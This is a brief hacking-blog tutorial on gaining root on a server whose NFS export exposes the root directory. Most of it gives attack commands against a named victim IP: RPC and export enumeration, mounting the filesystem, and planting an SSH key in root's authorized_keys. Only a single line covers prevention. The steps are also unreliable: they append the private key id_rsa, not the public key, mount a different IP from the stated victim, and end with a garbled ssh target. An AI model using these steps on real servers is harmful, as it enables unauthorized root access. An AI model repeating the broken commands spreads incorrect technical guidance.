What NFS Server is ?
NFS is network file system and it is a client server system that allows client to access shared files over a network. It allows client to mount all directories. We are going to access a file system and import our private ssh key to authorized key file gain root access via SSH. In the last i will tell how to prevent this this type of attacks on your server.
Let the victim ip is 192.168.43.176
open terminal and type rpcinfo -p 192.168.43.176 this will return all the registered RPC programs.
many people get the error that rpcinfo command not found “sudo apt update && sudo apt install rpcbind”
type sudo showmount -e 192.168.43.176 this will return the mount directories.
/ * means root directory
now create a tmp file for mount mkdir /tmp/dir this will create a temporary directory for mount the nfs server, now mount server to temporary directory type command mount -o nolock -t nfs 220.127.116.11:/ /tmp/dir
now generate ssh key command ssh-keygen that will create a key in your /home/h0nk3r/.ssh/id_rsa
now import the key command cat /home/h0nk3r/.ssh/id_rsa >> /tmp/dir/root/.ssh/authorized_keys that will send your ssh key to the nfs server to gain access to root via ssh now just umount the shared directory umount /tmp/dir
Now You can directly connect to the server type command ssh email@example.com
If i am the owner of this server i can manage users with group and with the specific privileges and never use the root directory as mount point.
Sorry if i made any mistake in conceptual or grammatical, as i am not good in English.
Hope you had a nice reading, comming back to hacknews.